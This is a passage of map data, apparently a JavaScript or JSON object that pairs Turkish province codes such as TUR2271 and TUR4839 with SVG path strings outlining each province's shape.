0.3-3.2-0.3-3.1-1.6-3.1-1-1-0.9-0.8-1.1-1.9-1.2-2-0.8-5.6-3.4-1.6-0.4-1.6-0.2-1.5-0.7-1.4-0.9 0.5-2.3-1.5-1.8-0.4-2.4 0.2-2.5-0.2-2.3 0-2.2 1.2-1.4 5.2-3 1.6-1.2 0.3-2.5-1.2-0.4-1.4-1.5-1.5-1.2-6.1-1.5-1.5-1.7-0.1-2.5 0.4-3.1 0.1-0.5 0.5-0.8 1.6-1.6 1-1.8-0.7-2.2 0.7-1.7 1.6-1.1 1.5-1.3 1.3-0.4 1-0.5 0.2-1 0.4-0.8 6.3-0.8 1 0.8 1.1 0.1 1-0.9 0.9-1.2 2.2 1.2 0.8 4.1 3.5 3.6 12.1 5 3.2 0.4 1-0.3 0.8-0.9 0.6-2.8 1.7-1.2 3.5 2.4 2.5 4.2z\",\r\n    TUR3011: \"M407.8 237.8l-1 1.9-3 3.4-1.2 2.2-0.7 5.3-1.9 2.8-1.2 3.5-0.3 2.5-0.8 2.3-0.4 5.4 1.9 5.1 0.7 0.5 0.5 0.7 0.4 2.8 0.8 2.5 3.5 4.3 2.2 2.1 2.2 0.1 6.2-1.4 8.2-0.6 4.1 0.2 4.1-1 4-1.6 3.9-0.9 3.9 0.6 0.7 3.4 1.8 2.7 2.5 1 2.4 1.3 2 2.9 1.8 3.2 2 2 1.7 2.3 0.6 3.8-1.2 3.4-1.2 1.4-0.8 1.7-0.3 3 0 1.9 2 2.9 1.3 1 1.9 2.2 1.2 2.8-0.6 2.1-1 0.7-2.7 0.9-1.6 0.9-2.3 2.2-3 1.5-4.5 1.6-1.4 0.8-1.8 2.2-1.3-2.6-3.5-5.9-7.3-7.9-5.9-6.5-1.1-4.2 0.1-1-0.3-3.2-2.2-0.8-5.1-0.2-2.4 1.5-1.5 2-2.6 3.4-5.3 2-8.1 0.5-7.8 1-4.9 2-8.9 9.9-6.3 8.6-4.9 6.5-1.3 4.3 0.3 2.3 3.2 1.5 3.1 0.2 0.8 1.8-0.2 1.9-1.6 2.5-7.4 7.4-5.9 4.4 0.4-4.4-0.8-4.3-1.1-1.6-1.7-0.4-2.4-0.2-2.2-0.8-0.8-1.8 0.6-2 1.3-1-0.2-2-1.7-1.1-2-0.8-3.5-3.3-1.5-1.1-1.5-1.4-2.3-3.3-2.6-2.8-3.7-2.5-3.3-3.2-4.4-2.8-13.4-2.8-5.2 0-2.2-0.9-2.1-1.7-1.2-1.3-1.1-1.4 1.4-3.7 0.5-3.9-0.7-2.4-1.3-2 0-2.3 2.2-0.7 1.7-2.1 0.3-3.1 2.1-3.5-0.1-5.1-1.2-5.2 1.1-4.3 1.7-1.1 3.7-1.4 3.3-2.1 0.4-2.2-3.8-3.3-1.2-1.8-1.8-0.7-3.6-3-3.1-4.2-4.1-3.3-1.5-4.9 9.2-6 4-4.2 4.5-6 0.2-1.5-0.2-1.3-0.1-1.4 0.8-3.5 1.6-3.2 4-6.6 0.4-2.7-0.9-0.6-1.6-1.6 0.5-1.7 0.7-4.5 3.1 0.4 4.1-0.7 0.8-1.1 0.3-1.9 0.2-2 2.3 1 2.2 1.4 7.5 6.2 1.9 0.6 5.4-1.6 2.7-0.3 4.4 1.5 1.7 0.9 1.9 1.8 2.2 0.2 3.1-2.5 3.3-1.6 3.9 1.7 2.4-1.4 1.9-2.5 5.3-4.4 2.5 0.8 3 2.3 2.3 0.4 0.7-1.3 0.5-3.5 0.5-1.7 1-1.4 2.2 0 2.3 1.7 0.9 0.5 3 1 5.1 3.7 2.8 6.5 0.3 3.6-0.3 3.7-0.6 3.9 0.2 3.8 1.1 2.8 1.3 2.5 1.7 2.4 1.1 2.7z\",\r\n    TUR2273: \"M275.8 321.5l-3.6 3.2-1 2.8-3.2 3.5-1.9 0.5-4.1 0-4.7-0.5-7.2 0.3-1.3-0.5-3.2-3.9-3.1-0.4-7.8 3.2-3.2 0.6-9.3 4.9-2.9 3.9-0.8 4.9-2 3.8-1.5 1.4-1.2 1.8-1.4 0.8-1.5 0.2-4.5-6.1-6.2 0.8-2.6 3.2-2-0.8 0.9-3.8-1.2-3.3 0.4-3.6 0.9-3.4 1.4-3.1 5.1-7.7 2.3-4.6 0.2-0.6-0.2-0.9-0.3-0.6-0.4-0.3-0.7 0.1-0.6-2.5 0.1-2.6-0.5-1.8 0-1.8 6.7-3.5 0.5-1.5 0.7-1.4 1.5-0.9 0.8-0.4 2.1-1.2 3.7-3.1 4.2-1.5 4.7 0.3 0.7 2.2 1 2 2 0.7 1.9-0.9 5.8-4.3 1.5-0.8 1.4-1 2.4-2.5 2.6 1.9 2.3 3.3 2.1 2.1 2.2 1.8 3.7 0.6 3.3 0 3.1 1.9 1.7 5.3 1.4 3.2 3.2 4.8 0.5 1.2 0.9 1.1 0.8-0.1 1.6 0.2 1.1 1.5 0.7 1.9z\",\r\n    TUR2272: \"M315.6 207.7l-0.7 4.5-0.5 1.7 1.6 1.6 0.9 0.6-0.4 2.7-4 6.6-1.6 3.2-0.8 3.5 0.1 1.4 0.2 1.3-0.2 1.5-4.5 6-4 4.2-9.2 6-1.3-0.4-1.2-0.7-2.3-3.4-1-0.8-1-0.6-1.3-0.2-1 0.9-2.6 2.8-6.5 5.3-3.2 3.7-3.3 3.1-4 1.6-1.1 0-1.1 0.3-3 2.4-2 0.5-1.9 0.8-2.5 2.9-2.8 2.5-2 1.2-4.7 4.6-3.5 2.1-1.1 2.1-0.7 6.8-1.7 3.2-3.7 2-4.1 0.2-4.7-0.3-4.2 1.5-2.3-4.1-0.6-0.5-0.8-0.2-1.4-0.7-0.7-0.3-2.4 0-1.2-0.5 0-6.7 0.8-1.9 1.7-0.7 1.6-0.8 14.1-10.6 1.4-1.7-0.8-4.4-1.4-1.7-5.6-9.4-7.2-1.7-0.1-1.8 1.2-1.5 1-2.8 0.7-2.6 3.2-3.1 0.8-2.5 0.3-2.8 10.8-6.5 1.5-1.9 2.1-3.6 1.4-4.5 1.4-2.8 0.8-3.1 1-2.7 6.2-2.8 3.6-5.6 1.9 0.4 1.4 1.4 0.8 2.2 1.2 1.5 0.9 0.5 0.8 0.7 2.4 1.3 2.4-0.4 1.8-0.9 3.5-2.3 3.3-3.3 1.9-1.4 2.6 1.2 2.2 2.6 3.8-1.7 3.8-2.9 2-0.5 1.9-1.3 1.8-1.6 2.1-0.6 3.7 3.9 2.6 5.9 3.9 3 6.7-0.7 4.1 0.1 2 0.5z\",\r\n    TUR2271: \"M213.5 403.5l0.2-0.6 0.4-0.5 0.7 0.2-1.3 0.9z m-12-2.1l-0.5 0.3-0.7-0.3 0.4-0.4 0.8 0.4z m2.6 2.2l0.5-2 0.6-0.7 0.4-0.3 0.4 0-0.1 1 0.4 0.2 0.1 0.4-0.9 0.5-0.1 0.3-0.5 0.4-0.8 0.2z m17.3-4l-0.3 0.6-0.4-0.1-1.4 0.3 0.2-0.5 1-0.6 1.8-0.4-0.9 0.7z m133.7-31.9l1.8 4.7 2.2 4.4 1.4 1.8 1.7 1.2 2.1 1.1 1 2.1-0.5 3.8 0.3 7.2-0.8 3.1-0.9 1.6-0.7 1.7-0.2 1.7-0.4 1.5-0.8 1.3-0.1 0.4-0.2-0.1-1.9-0.2-1-0.3-4-2.3-0.5-0.5-0.4-0.8-0.9-0.4-1.1-0.3-0.8-0.5-2.4-3.3-0.5 0-0.2-0.4-1-0.6-0.2-0.4-0.2-1.9-0.2-0.5-1.2-1.8-3.1-2.8-1-2.8-0.6-0.8-0.7-1.3-0.9-0.3-0.9-2-0.6-1.1-0.8-0.4-3.2-3.3-0.4-0.2-1.6-0.2-1-0.8-2.1 0.1-1.1-0.2-0.4-0.6-0.6-0.6-1.3-0.4-1.5-0.3-0.9 0.2-0.5-0.5-2-0.8-1-1.5-0.7-0.6-0.6 0.1-1.1-0.2-4-1.8-0.8-0.7-0.8-0.9-9.8-4.4-1.5-0.3-0.2-1.6-1.8-1.1-20.9-3.1-8.6 0.5-1.4-0.4-1.1-0.7-2.1-1.6-3 2-1.4 1.4-0.8 2-0.9 1.7 0 2-0.3 2.1 0.1 1.2 0.5 1 0 0.4-0.7 1.1-0.2 0.6-0.1 1 0.1 1.1 0.7 1.2 0.2 0.8 0.4-0.4-0.1 1.3-0.7 2.3 0.1 0.8-1.8 1.5-0.8 1-0.6 2.3-1.1 1.8 0 0.5-0.7 1.1 0.1 1.1 0.6 0.9 0.7 0.5-0.4 0.9 1.4 0.5-0.8 0.9-1.4 1.2-0.6 1.4 0.7-0.1 0.4 0.1-0.5 0.5-0.7 0.6-0.7 0.6-0.5 1.4-0.7 0.9-1.5 1.3 0.1-2.8-0.3-1.1-0.6-0.5-1.2 0.3-5.5-2.5-1.1-0.1-4 0.7-0.4 0.5-0.2 1-0.1 1.3-0.3 0-0.4-1.2-0.3 1.2 0 0.5-0.8-0.5 0 1-1.9-0.5-0.8-0.5-0.1 0.5-3.5 1.9-0.8-0.1-0.6 0.4-0.6-0.1-1.3-0.3-0.7 0.2-0.7 0.7-0.9 0.5-1.9 0.4-0.4 0.9-0.5 0-1.3 0.4 0 0.4 1.1 0-0.7 0.7-0.8 0.6-0.8 0.4-0.9 0.1 0-0.4 0.2-0.3 0.5-0.6-0.7 0.1-0.4 0.4-0.6-0.7-0.6-0.2-0.7 0.1-0.6 0.3-0.4 0.7-0.5 0.4-0.9 1.1-0.2-1.3-1.8-0.9-0.5-1.3 0.7 0.3 0.3-0.3-0.1-0.6-0.4-0.3-2.6 0.4 0-0.4 1-0.5 0.5 0-0.6-0.5-4.2 0.1-1.4-0.3-3.2-1.9-0.6 0.6-0.3-0.6-0.2-1.8-0.3 0.5-0.7-0.5-0.8 0.4-0.6 0.8-0.4 0.9-0.4 0.2-0.5-0.4-0.6-1-0.3 0.4-3.2-3 1.4-0.7 1-1.3 0.3-1.7 0-1.7 0.5-0.9 0.3-1.1 1.7-3.6 3.3-1.3 1.6 0.7 1.1-0.6-0.2-1.8 0.4-1.8 2.4-2.1 2.6-1.9 0.9-3.6-0.7-4 5.7-13 1.5-0.2 1.4-0.8 1.2-1.8 1.5-1.4 2-3.8 0.8-4.9 2.9-3.9 9.3-4.9 3.2-0.6 7.8-3.2 3.1 0.4 3.2 3.9 1.3 0.5 7.2-0.3 4.7 0.5 4.1 0 1.9-0.5 3.2-3.5 1-2.8 3.6-3.2 4.6 1.9 5.4-1.9 2.8-0.4 2.5-1.8 2.6-0.9 2.8 0.4 1.1 1.4 1.2 1.3 2.1 1.7 2.2 0.9 5.2 0 13.4 2.8 4.4 2.8 3.3 3.2 3.7 2.5 2.6 2.8 2.3 3.3 1.5 1.4 1.5 1.1 3.5 3.3 2 0.8 1.7 1.1 0.2 2-1.3 1-0.6 2 0.8 1.8 2.2 0.8 2.4 0.2 1.7 0.4 1.1 1.6 0.8 4.3-0.4 4.4z\",\r\n    TUR2270: \"M446.9 10.7l0.2 4-1.5 4.1-2.6 3.2-0.1 2.3 3.4 1.3 1.9 0 2.2 0.2 3.2 0.9 6.3 0.3 3.5 1 2.9 3.9-1.8 4.7-1.7 1.2-1.6 1.5-1 2.3-0.5 2.7 0.4 1.3 0.5 1.4-0.4 9.1-2.7 0.6-1.8 2.6-1.5 3.8-1.2 1.5-2.4 2.2-1.8 4.5-1.8 2.2-0.6 1.4 1 2.6 1.1 0.4 1.7 1.9-1.2 3.4-7.4 3.1-4.6 1-2.1-0.1-2.2-0.5-1.7-1.2-1.7-1.6-3-1.1-2-3.3 0.6-2.1 1.4-1.5 1.6-2.2-0.6-2.7-0.8-0.5-1.7 0.6-8.5 4.6-4 0.7-5.5 3.3-2 0.7-2.4-0.8-2-2.3-4.7-3.1-6.7-0.8-0.7-0.6-1.2-1.6-0.5-0.9-1.1-1.6-2.8-1.2-2.9-0.5-1-7.4 0.5-2.4 2.3-3.2 2.8-2.7 5.1-1.1-1.5-3.4-1.5-6.2-3.7-2.8-3.9 1.3-3.1 0.5-1.8-2-0.5-5 3.4-2.4-1.9-5.1-1.5-3.1-0.5-4.2 1.5-0.4 0.9-0.5 0.6 0.3 3.6-1 1.9-0.8 2.4-1.6 8.2-2.8 8.3-4.4 1.9-0.1 3.8 0.7 5.6 0 1.1 0.2 2.7 1 11.1 1.1 0.9-0.3 1.5 0.5 6.8-0.5 11.1 1.5z\",\r\n    TUR2277: \"M157.2 203.4l2.6 2.9 1.1 0.9 7.8 1.7 1.6 1 3.3 5.3 0.5 1.1 0.4 1.1-0.5 4.1 1.7 3.2 1.1 3.1-0.2 4.2-1.9 2-4 3.1-0.6 1.4-1.6 1.7-1.5 0.5 0.2 2.4 1.5 0.5 1.2 1.5 0.2 1.4 0.1 1.6 0.3 3.3-0.3 3.1-0.7 2-1.1 1.7-1.4 1.3-0.5 1 1.4 1 1.5 0.1 2 2.1-4.9 1.1-2.3 4.5 0.2 1.8-0.7 1.6-2.1 1-2.4 0.1-7.1-0.2-2.3-3.5-2.2-6.8-1.4-1.9-2.4-0.6-1.2-0.1-1.8-0.6-1-1.2-1.4-0.2-2 0.6-5.1 0.8-1.4-3.3-2.1-2.4-1.6 0.5-1.6 0-2.5-1.2-2.5-0.1-0.8 2.1-1.3 2.2-2.6 0.6-2.2-2-0.4-1-0.6-2.1-0.5-1-4-1.9-3.7-2.5-0.8-3.7-1.6-1.6-1.1-0.1-5.8 0.1-3.7-0.4-3.1-2.6-1.4-4.6-1.2-1.6-0.8-0.3-1.4-1.5 0.2-1.4 1.5-2.4 1.6-1.7 0.9-2.2 0.3-2.6 0.6-2.4 2.9-2 3.3-1.3 3.4-2.9 1.4-1.6 0.4-3.6-1.9-3.6-0.9-2.4-1.7-8.1-2-5.2 4-2.1 2.4 1.2 2.2 1.8 3.7 1.1 3.7-0.5 2.1 0.1 2.1 1.1 0.8 0.1 1.7-0.3 0.8-0.1 1.3 2.2-1.6 2.8-0.6 2.3 2.1 1 3.9-1.4 0.8 0.4 0.4 1 4.3 4.7 2.6 6 2.4 0.9 2.2-1 2.3-0.4 1.9-1.2 1.4-1.9 2.2-0.4 2.2 0.2 2-0.2 1.9-0.5 4.8-2.5 4.6 0.7z\",\r\n    TUR2276: \"M210.3 152.7l-0.9 5.8 0.3 2.8 1.7 3.7 0.9 1.1 2.1 1.3 1.8 0.8 5.8 4.1 2.2 0.7 4.1-1.2 3.9-0.5 2-0.5 2 3.3 5.7 5.5 1.4 4.1 0.7 5.2 5.2 6.9 0.9 4.3-3.6 5.6-6.2 2.8-1 2.7-0.8 3.1-1.4 2.8-1.4 4.5-2.1 3.6-1.5 1.9-10.8 6.5 0-6.9-2.5-2.9-1.5-0.6-6.5-1.5-3.3 0-1.4 0.5-1.4 0.8-0.9 3.7-1.3 3.1-3 0.3-6.5 1.8-3.8 0.2-3.5-0.5-3.2-2-3 0-2.9 2.4 0.2-4.2-1.1-3.1-1.7-3.2 0.5-4.1-0.4-1.1-0.5-1.1-3.3-5.3-1.6-1-7.8-1.7-1.1-0.9-2.6-2.9 0.3-0.7-0.1-1.7-0.3-0.8 0.5-2.3 2-1 3.8-1.3 1.7-1.2 1.6-2.9 0.4-1 1.2-1.5 1.2-2 0.7-4.8 0.7-1.9 0.6-0.6 0.4-0.9 0-1.3 0.3-1.3 1-2 2 1.6 2.3 0.5 3.7 0.5 3.7-0.1 2.9-1.8 0.3-4.5 1.1-3.1 2.4-1.8 1.5-5.4 1-1.1 0.6-1.6 1.1-4 2.6-1.9 5.5 2.2 1.6 0.2 1.7-0.3 1.5-0.7 1.6-0.2z\",\r\n    TUR2275: \"M292.5 252.5l1.5 4.9 4.1 3.3 3.1 4.2 3.6 3 1.8 0.7 1.2 1.8 3.8 3.3-0.4 2.2-3.3 2.1-3.7 1.4-1.7 1.1-1.1 4.3 1.2 5.2 0.1 5.1-2.1 3.5-0.3 3.1-1.7 2.1-2.2 0.7 0 2.3 1.3 2 0.7 2.4-0.5 3.9-1.4 3.7-2.8-0.4-2.6 0.9-2.5 1.8-2.8 0.4-5.4 1.9-4.6-1.9-0.7-1.9-1.1-1.5-1.6-0.2-0.8 0.1-0.9-1.1-0.5-1.2-3.2-4.8-1.4-3.2-1.7-5.3-3.1-1.9-3.3 0-3.7-0.6-2.2-1.8-2.1-2.1-2.3-3.3-2.6-1.9-2.4 2.5-1.4 1-1.5 0.8-5.8 4.3-1.9 0.9-2-0.7-1-2-0.7-2.2 4.1-0.2 3.7-2 1.7-3.2 0.7-6.8 1.1-2.1 3.5-2.1 4.7-4.6 2-1.2 2.8-2.5 2.5-2.9 1.9-0.8 2-0.5 3-2.4 1.1-0.3 1.1 0 4-1.6 3.3-3.1 3.2-3.7 6.5-5.3 2.6-2.8 1-0.9 1.3 0.2 1 0.6 1 0.8 2.3 3.4 1.2 0.7 1.3 0.4z\",\r\n    TUR2274: \"M219 296.6l-3.7 3.1-2.1 1.2-0.8 0.4-1.5 0.9-0.7 1.4-0.5 1.5-6.7 3.5 0 1.8 0.5 1.8-0.1 2.6 0.6 2.5 0.7-0.1 0.4 0.3 0.3 0.6 0.2 0.9-0.2 0.6-2.3 4.6-5.1 7.7-1.4 3.1-0.9 3.4-0.4 3.6-2.5 2-0.3 4.2-0.6 1.7-1.1 1.4-1.8 0.9-5.2-2.8-2.9-0.2-1.2-1.3-0.2-1-0.2-2.2-0.4-2.5-0.7-2.5-3.2-3-3.8-1.8-0.6-0.7-1-1.8-0.6-0.7-3.9-0.5-1.7-2.6-0.7-3-1.5-2.7-2.5-1-1.8 0-1.4-0.5-0.5-1.9 0-1.9 0.2-1.3-0.6-1.2-0.3-0.9-0.4-0.9-1.1-0.6-0.6-2.5 1-2.5 3.7-1 4 0.5 2.8-2.7 2.4-3.4 2-0.1 1.6-1.2 0.2-1.8-0.5-1.5-3.4-0.7-1.1-1.7-0.8-1.7-1.1-1.5 0.1-1.7 1.2-0.9 0.4-1.4-0.8-4 0.1-2.2-0.6-2-2.9-2-0.7-1.4-0.6-1.5 2.4-0.1 2.1-1 0.7-1.6-0.2-1.8 2.3-4.5 4.9-1.1 3.1 0.7 2.8 1.7 2.9 0 2.7-1.8 1.8 0.3 1.7 1.9 1.7 0.1 1.7-0.6 1.4-0.7 1.3 0.9 0.6-0.1 0.7-1.3 0-0.9 2.6-2 3.7 0.4 4-0.1 1.9-0.6 1.7-1.5-0.4-3.9 0.4-4 6.5-1.5 7.2 1.7 5.6 9.4 1.4 1.7 0.8 4.4-1.4 1.7-14.1 10.6-1.6 0.8-1.7 0.7-0.8 1.9 0 6.7 1.2 0.5 2.4 0 0.7 0.3 1.4 0.7 0.8 0.2 0.6 0.5 2.3 4.1z\",\r\n    TUR2278: \"M170.6 367.1l1.1 0.5-0.5 0.4-0.7 0.9-0.3-0.7 0.1-0.9 0.3-0.2z m-74.8-18.2l-0.4 0.2-0.4-0.3-1.1-0.4-0.2-0.6-0.3-0.4-0.6-0.4 0.4-0.3 1.6 0.8 1 0.3 0.5 0.4-0.1 0.5-0.4 0.2z m99.5-6.9l1.2 3.3-0.9 3.8 2 0.8 2.6-3.2 6.2-0.8 4.5 6.1-5.7 13 0.7 4-0.9 3.6-2.6 1.9-2.4 2.1-0.4 1.8 0.2 1.8-1.1 0.6-1.6-0.7-3.3 1.3-1.7 3.6-0.3 1.1-0.5 0.9 0 1.7-0.3 1.7-1 1.3-1.4 0.7-0.3-0.2-0.4-1-0.7-0.8-3.1-1-0.9-1.1-0.7 0.5-0.2-0.9 0.2-0.4 0-0.5-1.5 0 0.4-0.4-0.6-0.4-0.8-0.1 0.2-0.6 0.4-0.4 0.5-0.2 0.6-0.1-0.3-0.5 0.3-1.2-0.3-1.1-0.6-0.8-0.8-0.5 0-0.4 0.7-0.5 0.7-0.3 0-0.5-0.2-2.3-0.3-1.1-0.5 0.3-0.4 0-0.7-0.8-2.5 1-1.1-0.2 1-0.2 0.2-0.7-0.3-0.8-0.6-1 0.3-0.4 0.5-1.2 0.3-0.7 0.8 0.7 0.6-0.6 0.7-1 0.8-0.3 0 0.4-0.3 0.7 0.4 0.2 0.6-0.2 0.3-0.5-0.4-1.2-0.6-0.8-3.3-2.3-4-1.8-0.6-0.6-0.3-0.9-0.9 0.6-0.9 1.2-0.7 0.7 0.3 0.4 0 0.5-1 0-0.8 0.4-0.1 0.5 0.1 1.1-0.7 0.2 0.3 0.5 0.4 0.4-0.3 0.5 0.7 0.8 0.3 0 0.6-1.1 0.1-0.6-0.3-0.9 0.9 0.8-0.3 1.1-0.9 1-0.8 0.6 0.4 0.7-0.6 0.3-0.9 0.1-0.7-0.1-0.5-0.6 0-0.6 0.4-0.5 0.8-0.2 0-0.4-0.8-0.5-0.6-0.4-0.5-0.3-0.9 0.3-0.3-1.7-1.9-1.3-2.3-0.5-1.6 0.8-0.3 0-0.3-1.2-0.5-0.5-0.7 0.3-0.7 1-0.4-0.5-0.6-1.8 0.5-0.9 0.2-1.2-0.2-1.2-0.5-0.7 0.3-0.4-0.3-0.9-0.3 0.8-0.4 0.3-0.1-0.6-0.7-0.8-1.5-0.2-1.1 0.6 0.1 1.6-0.5-0.4-1-0.2-0.6-0.2 0.7-0.5 0-0.4-1.2 0-0.7-0.2-0.4-0.7-0.2-1.3 0.6-0.1 0.1-0.6-0.3-0.3-0.2-0.9-0.5-0.3-0.1 0.6-0.4 0.6-1.1 0.3-1.5 0.2-0.5 0.2 0 0.3 0.7 0.9 1.2-0.1 0.6 0.5-0.6 0.9-0.4 1-0.5 0.7-1 0-2.7-1.4-0.6-0.3-0.3 0 0.3 1.3-1.3 0.1-0.6-0.2-0.2-0.5 0.2-0.6 0.6-0.3 1.3-0.3 0-0.4-0.6-0.4-0.7-0.7-0.8-0.4-0.9 0.4-0.7 1.1-0.3 1 0.1 1 0.7 0.6-0.2 1.5 2.1 1.5 0.3 1.5-0.6-0.4-0.8-0.3-0.8 0.2-0.3 1-0.7-0.5-0.1 1 0.1 0.4-2.7 0.9-1 0.8-1 1.4-0.7 1.4-1 1.6-1.2 1-1.4-0.4-0.3 0.6-0.7 0.2 0.3 0.9-0.6 0.3-0.5 0.1-0.4-0.2-0.3-0.6-0.5 0.9-0.7 0.1-0.6-0.4-0.6-0.6 0.3-0.9-0.7-0.8 3.9 0 1-0.5 0.6-0.6 0.5-0.8 0.8-0.8-0.7-0.9-1 0.9-0.5 0 0.5-0.6 0.2-0.8-0.2-0.8-0.5-0.5-0.6-0.2-0.1 0.8-0.2 0.3-0.6 0-1-0.5-0.4 0.2-0.6 0-0.5-0.3-0.2-0.6 0.2-0.2 1.9-0.4-0.4-0.5 1.1 0.1 0.4-0.1 0.5-0.5 0.2-0.4 2-0.1 0.5-0.3-0.2 1 0.8 0.1 0.8-0.6 0-1-0.5-0.3-1-0.1-0.3-0.5 0.1-0.4 1-0.9 0.4-0.5 0.3 0.8 0.7 0.6-0.3-1.1 0-1.4-0.3-0.5-0.6-0.2-0.6 0.1-0.5 0.3-0.9 1.4-1.1 0.8-0.4-0.1-0.3-0.7-0.8 0.8-2 0.6-0.7 0.4-0.4 0-0.3-0.8-0.5 0.3-0.6 0.6-0.8 0.4-0.2-0.9-0.4 0.1-0.8 0.8-0.7-0.7-0.3-0.1-0.4 0.8-0.4 0-0.6-0.6-0.9-0.5-1.1-0.2-0.9 0.4 0-0.4-0.7 0.3-0.6-0.1-1.4-0.2-0.9 0.3-1.1 1.4-0.7 0.5 0.1 1-0.7 2-0.1 1.5-1.8-0.9-0.9-0.4-0.9-0.1-0.9 0.1-0.8 0.2-0.5 0-0.3-0.7-3.6 1.3-0.4 0.7-0.5 0.1-0.7-0.7-0.3-0.1-1.7-0.3-0.6 0.3-0.2-0.8-0.4-0.5-0.5 0-0.7 0.4-0.1-1.2-0.7-0.6 0-0.4 0.7 0.3 0.8 0.2 0.9 0 0.7-0.3 0.4-0.7 0.3-1 0.5-0.8 0.6-0.4 0.5-0.1 1.3 0.1 3.8-0.6 1.9 0.2 1-0.3 0.2-0.7 0.1-0.9 0.3-0.8 1.1-0.3 2.4 1.4 0.8-0.3 0.8 0.5 1.4-0.2 0.6 0.2 1.3-1.3 0.7-0.3 4.6-0.2 0.6-0.2 0.3 0.4 0.8 0.4 1.1 0.3 1 0 1.8-0.2 0.9 0.3 0.9 0.8 0.1-0.7 0.3-0.3 1-0.8-0.3-0.7-0.5-0.4-0.7-0.2-1 0 0.3-0.4 0.5 0.1 0.1-0.3-0.7-1.3 0.5-0.3 0.4 0.2 1.4-0.7 0-0.4-1-1.1-0.8-1.2 0.7 0.5 0.4-0.5-0.3-0.2-0.4-0.7 1.7 0 0-0.4-1 0 0-0.5 1.2 0 0.5 0.1 0.4 0.4 0.6-0.4 0.5 0.4 0.4 0 0.5-0.4 1.1 0.6 0.8-0.2 0.1 0.5 0.3-0.1 0.2-0.5-0.6-0.4 0-0.4 0.9 0 0.6 0.4 1-1.8 0.4-0.4 0-0.5-0.7 0 0.4-0.6 0.3-0.7 0.8 0.7 0.9 0.1 0.4-0.3-0.3-1 2.8-1.1 1.5-0.3 0-0.5-0.8-0.7-0.5-0.2-6.8 1-2.5 0-1 0.2 0.2 1.2-0.9-0.5-5.6-0.9-0.6 0.2-0.6 0.6-0.6 0.1-0.6 0-1.5-0.4-1.3 0.1-4.3 1.4-0.8-0.2-0.4 1-0.9-0.3-0.6 0-0.7 0.3-1-0.8-1.7 0-1.6 0.6-1 1-1-0.6-1.4-0.5-1.2 0.1-0.3 1.5-1.2-0.9-0.6-0.3-0.7-0.1-1.6 0.1-0.6-0.1-0.5-0.5-0.9-1.4-0.4-0.4-0.7 0.1-0.8 0.6-0.6-0.7-0.1 0.6-0.6 1.7-0.2-0.4 0.2-0.6-0.4-0.4 0.3-0.3-0.3-0.6-0.5 0.4-1.3 0.2-0.7 0.3 0.2 1.1-0.3 0.8-0.6 0.5-0.7 0.3 0.3 0.9-0.7-0.1-0.4 0.1-0.3-0.5-0.9 0.2-0.5-0.9-0.3-1.5-0.1-1.1-0.2-1.1-0.5-0.8-0.2-1 0.6-1.4 0.4 0 0.9-0.4 0.9-0.6 0.6-0.8-0.8-0.4-0.4 0.1-0.5-0.2 0.5-0.7 1.7 0.6 1-0.3-0.1-0.4 0.2-1.1-0.1-0.7 0.5 0.1 0.4 0.4 0.2 0.6-0.1 0.7 0.4 0 0.3-0.7 0.3-0.5 0.4-0.1 0.4 0.4 0.4-0.5 0 1.1 0.1 0.3 1 0 0.7 0.6 0.7 0.2 0.7 1.4 0.8 0.5 0.8-0.2 1.3-1 1.1-0.5 1-0.7 1.2 0 0.6-0.3 0-0.5-0.7 0.2-0.4 0.3-0.4-2-0.4-1.1-0.6-0.5 0-0.5 2.4-0.5 0.7 0.1-0.6 1.4 1-0.5 0.8-0.9-0.8-0.3-0.3-0.5 0-1.3 0.1-0.2 0.7-0.5 0.4-0.8 0.2-1.3-0.7-0.5-0.4-0.1-0.3 0.6-1.3-0.1-0.6 0.2-0.2 0.5-0.3 1-0.7 0.9-0.8 0.4-0.7-0.3 0.9-0.8 0.1-0.8-0.6-0.6-1.2 0-0.6 0.8-0.5 0.2-0.3-0.3 0.1-0.7 0.4-0.6 0.9-1.2 0-0.5 0.2-0.7 0.1-0.9-0.6-1.1-0.4 0-0.2 1.9-1.2 0.6-1.4-0.2-1.1-0.9-0.5-1.5 0.5-1.3 0.9-1.1 1.2-0.6-0.6-1-1-0.4-0.2 0 0.6-1.1 2.8-6.1 0.7-1.1 1.6-0.9 1.7-0.1 1.9 1.2 2 0.8 4.2 0.6 3.7 2.5 2.3 0.4 2.4-0.6 2.4 0 2.2 1.1 3.7 0.2 6.3-0.5 2-1.6 1.9-3.7 2.8-1.9 3.8 0.8 3.2 2.7 3.8 2.1 6.9 0.9 0.6 1.2-0.2 1.3 0 1.9 0.5 1.9 1.4 0.5 1.8 0 2.5 1 1.5 2.7 0.7 3 1.7 2.6 3.9 0.5 0.6 0.7 1 1.8 0.6 0.7 3.8 1.8 3.2 3 0.7 2.5 0.4 2.5 0.2 2.2 0.2 1 1.2 1.3 2.9 0.2 5.2 2.8 1.8-0.9 1.1-1.4 0.6-1.7 0.3-4.2 2.5-2z\",\r\n    TUR4839: \"M927.8 70.3l-3.4 1.1-5.3 3-17 7.3-6.2 3.3-1.2 5.3-0.8 8.2-1 5-6.2 0.6-6 1.2-1.6-2.8-2.1-2.1-1.5-2.3-1.1-2.7-1.5-1.9-1.9-1.3-2.7-4.1-1.1-5.3 3.3-6.5 4.5-5 4.4-2.2 1.4-4.7-1.5-4.8-1-2.5-0.4-0.7-0.6-1.7-0.4-3-0.7-4 0.6 0 1.1-0.7 1.6-2.4 1.1-1.2 0.5-1.1 0.5-2.9 0.5-1.2 1.1-0.8 1.3-0.4 2.6-0.2 7.3 0.6 1 0.5-0.4 0.6-0.3 1.4-0.2 0.7-0.4 0.5-1 0.8-0.5 0.7 1.4 0.8 1 1.1 0.9 0.3 1.3-1.4 0.7-0.5 0.4 0.5 0.3 0.8 0.4 0.8 0.4 0.3 1.5 0.5 0.8 0.9 0.5 0.2 0.4 0.4 1.6 3 0.7 0.8 3.8 2.6 2.6 2.2 1.6 0.8 1.5 0.2 0.1 0.4-0.7 1-0.8 0.7-2.8 1.4 1.4 0.5 1.1-0.2 1.1 0.2 1 1.2 1.3 3 0.7 0.6 4.8-1.4 1.5-0.1 1.7 0.5 1.4 0.8 1.4 1.3 0.8 1.7-0.6 1.8z\",\r\n    TUR4842: \"M554.5 302.5l-0.1 5.2-1.1 1.9-1.5 1.6-0.4 2 0.6 1.9 0.7 0.7 0.6 0.8 0.2 4.4 2.2 2.6 0.5-0.1 0.3-0.6 0.5-0.3 1.3-0.5 0.9 1 1.7-0.3 2-0.8 5.7-1.1 2 0.5 1.8 1.3 2.8 2.6 2.3 3.4-2.4 2.7-2 3.1-2.8 5.6-3.7 4.7-1.9 